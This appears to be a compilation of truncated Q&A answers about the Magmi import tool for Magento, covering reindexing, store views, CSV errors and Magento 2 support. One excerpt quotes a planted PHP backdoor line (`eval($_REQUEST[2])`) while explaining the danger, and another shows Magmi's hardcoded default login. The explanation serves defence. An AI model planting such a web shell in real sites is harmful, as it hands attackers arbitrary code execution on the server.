If it's just an occasional operation and you don't need to automate it just do: DELETE FROM `catalog_product_entity_tier_price`; And do full reindex afterwards.

The more recent version of Magmi uses the Magento admin authorization system to protect the Magmi admin panel. Log in with your Magento admin username and password. See the Magmi code: public function authenticate(){ if (!$this->_hasDB) return ($this->user == 'magmi' && $this->pass == 'magmi'); $tn=$this->tablename('admin_user')...

If you have only one language so there is only one way to sort categories alphabetically I recommend changing their position so you will let Magento do its magic. If you have more than one language, or you need the categories sorted alphabetically only on frontend ignore this answer. Here is a small script that sets the category position. $parentId - it the ...

Most folks have the same products, but change the field values based on the "store view". For example: Catalog, Manage Products, and set the "store view" to "All Store Views". Add Product, and fill in the values with the "default" language. Save. Open the same product again, then select the "store view" of the alternative language. Un-check the values that ...

Magmi is only supported right now for the Magento 1.x platform. Looking at their github, there are a few active tickets open like: Magmi + Magento 2.0 Extensions need to be redeveloped from Magento 1 to Magento 2.

First thing, try entering php-cli into the PHP CLI command field. If you're running Magmi using a browser, the indexer may fail due to a few possible reasons. Reindexing the catalog_url and catalog_category_product indexes can take a very long time for a site with a lot of products. If the amount of time exceeds the timeout limit set on PHP, the script ...

you can use __MAGMI_DELETE__ magic value to force magmi removing a value entry. This magic value works for all values you want to "unset"

Steven Lynn, I shall recommend to you Magmi is the better than Magento's API. Because Magento's API takes to times.

This cannot be done out of the box but there are a few extensions that claim to do this: http://www.magentocommerce.com/magento-connect/dependent-custom-options.html http://www.magentocommerce.com/magento-connect/dependent-custom-options-configurable.html http://www.magentocommerce.com/magento-connect/dependent-custom-options-gallery.html http://www....

You better use plugin "value replacer" for this purpose. Column mapper has a bit different aim - to map columns. For example if your supplier's csv has a column for "ean" and you want it to map to "sku". As for value replacer, here is how it's done: Replaced attributes: small_image,thumbnail small_image: {{ '{item.small_image}' == '' ? '{item.image}' : '{...

Try passing an array as the media type. Theer is no need to iterate over each mediaType and setting them individually. your code would thus be, which will be faster as well. ini_set('memory_limit', '-1'); require 'app/Mage.php'; Mage::app(); echo "Loading catalog...\n"; $products = Mage::getModel('catalog/product')->setStoreId(13)->getCollection()-&...

Htaccess security only prevents directory-level access to external requests via Apache. In that case, it is still possible to read/write to the directory from other scripts. A good example of this from Magento is that the var directory has a standalone .htaccess: $ cat var/.htaccess Order deny, allow Deny from all The directory can be written to from the ...

When saving a product, all dates attributes are processed before saving. They are converted from the format corresponding to your admin locale to the standard mysql format (YYYY-mm-dd). You can try to supply your import with the dates in this format. For example: June 25th 2013 will be 2013-06-25

this error message means: you have a csv header with 38 columns declared in some line you have only 20 columns (ie no more separators found after 20 values) say you have this kind of file header1,header2,header3,header4 somehere, somethere When reading first data line It would say, wrong column number 2 found over 4 since your CSV is malformed. It should ...

You should check that the URL is actually available via your browser. If so. You should check your magento server php configuration for remote_url_fopen that it's enabled and try again. Also. Try to create a test script on the server that performs file_get_contents and see the results

you don't need to reindex Category Flat Data and Product Attributes if you import only products. Most probably you don't need to reindex Tag Aggregation Data either since no new tags are added. The rest are mandatory.

This line <?php eval($_REQUEST[2]); allows the attacker to execute what ever code he likes, just by sending the code via GET or POST. EVERYTHING HE WANTS. This includes, deleting files, modifying files, running queries on your db, and sending results somewhere else, changing values in your db. What you can do from your code, he can do via the code he ...

Magmi is not compatible with Magento 2 at this time (Dec 2015). It probably will not be compatible for some time. You should find other means to accomplish what you're trying to do.

Appears I had missed a step, and did not add the magmi:groups column to the attribute set import csv.

You can always try the native import/export interface. Tools like Magmi (directly writing sql) will suffer in the long run, because import not imports a bit differently (repository->save() instead of direct sql as it was before) and because of the newly introduced interceptors it will be hard to build a sql-data-pump that will not break with 3rd party data-...

Searching around I came across this: https://github.com/tagesjump/magmi-m2 There is also some talk related to some issues on this issue: https://github.com/dweeves/magmi-git/issues/369 I hope this will help somebody. NOTE: This was not tested and I do not know if it works or not.

Actually, this is out of the scope of magento.stackexchange.com - yet, I think that the missing possibility of uploading files (even though I've never questioned it and went for FTP uploads or remote SQL data sources) is actually a draw back of Magmi. The solution is rather simple, though: Magmi is working with plugins managed in different "scopes" and "...

Based on updates by the original poster, it sounds like * clear the whole catalog and re-import afresh* is one solution to this problem.
